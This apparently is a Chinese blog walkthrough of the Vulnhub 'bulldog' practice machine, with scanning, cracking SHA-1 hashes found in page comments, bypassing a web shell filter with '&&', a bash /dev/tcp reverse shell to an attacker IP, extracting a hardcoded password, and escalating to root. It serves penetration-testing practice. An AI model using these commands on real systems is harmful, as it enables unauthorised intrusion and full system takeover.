bulldog 靶机

最新推荐文章于 2024-08-12 21:25:19 发布
最新推荐文章于 2024-08-12 21:25:19 发布
阅读量196 收藏
点赞数
分类专栏: 渗透测试 文章标签: linux 笔记 服务器 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133935855
版权

bulldog

信息搜集

存活检测

image-20231019132847932

详细扫描

image-20231019135132191

后台网页扫描

image-20231019135202749

网页信息搜集

image-20231019204915864

image-20231019140101794

正在开发的如果你正在读这篇文章,你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板,组长艾伦·布鲁克。CEO解雇了整个开发团队和员工。因此,我们需要迅速招到一批人。我要试着给你上一堂牛头犬工业网站的速成课。之前的网站是怎么被攻击的?APT利用了网络服务器上的一个漏洞获得了一个低权限shell。从那里,他们利用脏牛在盒子上生根。在那之后,整个系统被接管,他们破坏了网站。我们仍在从旧系统向新系统过渡。同时,我们正在使用一些文件,这些文件可能是从原始系统中损坏的。我们还没来得及确认有没有被黑的痕迹所以如果你发现了,给我发邮件。我们如何防止未来的违规行为?应Churchy先生的要求,我们将从新服务器上完全移除PHP。此外,我们不会使用PHPMyAdmin或任何其他流行的CMS系统。我们的任务是创造我们自己的。新系统的设计?新网站将完全用Django编写(Mr. Churchy要求“高端技术时髦的东西”)。到目前为止,系统上已经启用了SSH。当我们将转换到使用Web-Shell(一个专有的shell接口)时,这个功能将很快关闭。下面的链接解释了这个工具。另外,请注意,我们将开始使用MongoDB,但是我们还没有完全安装它。还要注意的是,我们将实施一个革命性的AV系统,这是由供应商为我们定制的。它宣称能够每分钟运行一次,以检测入侵和黑客行为。一旦它启动并运行,我们将把它安装到系统上。Web-Shell我该找谁开始呢?组长:alan@bulldogindustries.com备用组长:william@bulldogindustries.com前端:malik@bulldogindustries.com前端:kevin@bulldogindustries.com后端:ashley@bulldogindustries.com后端:nick@bulldogindustries.com数据库:sarah@bulldogindustries.com

在此界面的源码中发现了疑似加密的信息,依次解密查看

image-20231019205147493

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->.0

管理员登陆

  • 解析密码加密方式

    hash-identifier

  • sha-1 解密

    将密文存储到文件中

    image-20231019211911779

    john 解密

    john --format=raw-sha1 pas

    破解出密文 bulldog

    image-20231019212018179

  • 尝试当作密码登录管理员界面

    image-20231019212358962

    image-20231019212419125

    显示登陆成功,但没权限

  • 但此时 /dev/shell 界面可执行指令

    image-20231019212726765

反弹 shell

  • 执行允许的命令外的命令会被过滤

    image-20231019213719637

  • 尝试绕过

    /usr/bin/ping 127.0.0.1 -c 2

    失败

    image-20231019213806935

    pwd&&ping 127.0.0.1 -c 2

    image-20231019213845159

    可以使用 && 对过滤进行绕过

  • kali 开启监听

  • 命令框输入链接反弹 shell 命令

    pwd&&bash -c "bash -i >& /dev/tcp/10.4.7.132/7777 0>&1"

    image-20231019214246195

  • 成功连接

    image-20231019214305225

提权

  • 查找敏感文件

    image-20231019214633607

    image-20231019214659845

  • 查看二进制文件中可打印的字符

    strings customPermissionApp

    image-20231019214758371

    密码

    SUPERultimatePASSWORDyouCANTget

  • 切换用户,提示必须在终端执行

    image-20231019215418343

  • 创建一个新的终端

    python -c 'import pty;pty.spawn("/bin/sh")'

  • 切换 root

    sudo su root

    输入密码,提权成功

    image-20231019215917845

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 332
Bulldog1渗透实战 文章转载 靶机渗透测试实战(三)——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldog主机ip ​ 【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
靶机渗透(二)bulldog1
qq_42180996的博客
04-26 1612
靶机bulldog1 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)http服务(80/8080端口) 1.靶机开启apache服务,尝试web渗透 2.网站指纹信息扫描(whatweb) 3.目录扫描(dirb) 4.查看/admin页面 5....
bulldog123靶机渗透
yyh的博客
06-03 446
实验环境: 攻击机:Kali(192.168.150.129) 靶机bulldog123(未知) 思路: 信息收集=>寻找漏洞=>利用漏洞反弹shell=>提权至root=>清理痕迹 主机发现:(netdiscover) 被动监听netdiscover -p 主动扫描:netdiscover -i eth0 -r 192.168.150.0/24 端口扫描(masscan): masscan --rate=10000 -p 0-65535 192.168.150.132,#r
Bulldog】靶场记录
weixin_46411728的博客
09-18 867
bulldog靶场
Vulnhub-Bulldog1 靶机渗透
Majula
02-01 577
WalkthroughDownloadDescriptionPen TestingScanningExploitationPrivilege EscalationSolution ISolution IIReview Download BULLDOG: 1 - VlunHub VM 镜像文件。 这里 VM 我导入配置失败,分配不了 IP,建议用 VirtualBox,因为靶机默认模式是桥接,攻击机也要设为桥接模式。 我是 VM 运行 Kali,VirtualBox 运行靶机,如果你是这种情况,为了更加直观,
【渗透项目】Bulldog网站渗透
命运的旋律的博客
12-13 482
Bulldog网站渗透 文章目录Bulldog网站渗透1.渗透思路测试环境测试步骤1.信息收集主机发现端口扫描操作系统扫描2.漏洞探测网站指纹信息扫描目录扫描3.信息利用4.漏洞利用5.权限提升 1.渗透思路 进行信息收集,根据开放的端口以及服务,寻找可行的渗透方法 在未知目标主机的情况下,使用netdiscover主机发现获得主机IP地址 得到主机的IP地址后,使用masscan进行快速的端口...
渗透测试实战1--bulldog1靶机入侵
qq_45070118的博客
08-08 638
渗透一台linux主机 一.主动信息收集 扫描网段下的主机 netdiscover -i eth0 -r 192.168.10.129 主机发现 nmap -sn 192.168.10.1/24 扫描出5个 1(服务器)-2(网关)-5(是我开着的另一台虚拟机)-132-254(临界) 所以靶机ip为192.168.10.132 接下来扫描端口 masscan --rate=1000 --p...
【vulnhub】--- bulldog2靶机
qq_43168364的博客
08-21 414
目录 一、实验环境 靶机bulldog2靶机(192.168.1.102、192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、靶机设置 我们首先进行登录 我们发现登录进去之后靶机是没有IP地址的,我们看看它的网卡配置文件。 这里网卡设置的是dhcp,我们可以通过dhclient命令来获取IP。建议设置为桥接。 现在两个网卡就都有IP地址了。接下来就可以进行渗透了。 三、信息收集 首先用nmap进行主机发现,命令:nmap -sn 192.168.1.
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
渗透测试实战-bulldog
qq_46540840的博客
01-28 5929
环境准备 kali 当成攻击机 bulldog靶机 官网下载地址 Vmware装入即可,成功后是显示这个样子 kali ip 是:192.168.240.128 信息收集 使用nmap List item 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impor
靶机测试-bulldog
ximo的博客
02-27 362
测试步骤信息收集主机发现端口及其服务扫描目录扫描测试对应端口服务测试后台目录寻找漏洞:反弹shell因为知道网站的编程语言是python,所以可以通过python进行反弹shell:提权 信息收集 主机发现 kali IP地址查询,确认靶机存在网段 使用nmap进行主机发现: namp -sP 192.168.31.0/24 端口及其服务扫描 nmap -sV -O 192.168.31.181 发现开放了23,80,8080端口及其服务 访问其80及8080端口(因为此端口开放了http服
系统控制和管理接口:在Linux中利用电源和性能域进行平台资源抽象
csdnsqst0046的博客
08-09 877
在本文中,您可以了解到如何利用我们的方法将复杂性从Linux驱动程序(需要为每个平台编写不同的开发程序)转移到固件。由于固件已经适配了平台,因此固件知道需要采取哪些手段来配置外设。您可以了解我们如何定义逻辑性能和电源域,而不是单独处理每个平台资源。您还可以了解到我们如何努力实现这一目标,以及您如何进行尝试并做出贡献。
Linux9 Linux特殊符号
2401_82505448的博客
08-08 109
win里面的环境变量TEMP就是变量,变量名表示存放的目录。一些配置文件vi进去会有#(说明文字/某项功能)通过图中的指令,我们可以看到语言被改成了中文。例如:我们将指令注释掉,它就不再执行了。‘’也可以输出多行内容,但不能解析变量。例如:返回上一级cd..我们可以看一下它们的区别。表示两个命令同时进行。
Linux: 进程概念详解
MaoRuofeng的博客
08-11 812
截至目前,我们所认识的计算机,都是有一个个的硬件组件组成。【注意】这里的存储器指的是内存不考虑缓存情况,这里的CPU能且只能对内存进行读写,不能访问外设(输入或输出设备)外设(输入或输出设备)要输入或者输出数据,也只能写入内存或者从内存中读取。一句话,所有设备都只能直接和内存打交道。计算机就是为了完成指定的数据处理,而通过指令按指定流程完成指定功能,指令的合集就是一段程序。说白了计算机就是按照指定的指令执行流程完成对指定数据的处理。2. 操作系统(Operator System)先描述,再组织!
Linux Day1 系统编程和文件操作
最新发布
qq_63145217的博客
08-12 1053
1)使用标准库函数如fopen, fclose, fread, fwrite, fgetc, fputc, fgets, fprintf, fscanf等进行文件操作。1)用套接字(sockets)API,包括socket, bind, listen, accept, connect, send, recv等函数进行网络通信。nmemb 要写的数据块的个数(一般为sizeof(ptr))->1个1个读,到sizeof(ptr)为止。nmemb 要获取的数据块的个数,拷贝的数据块个数。
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值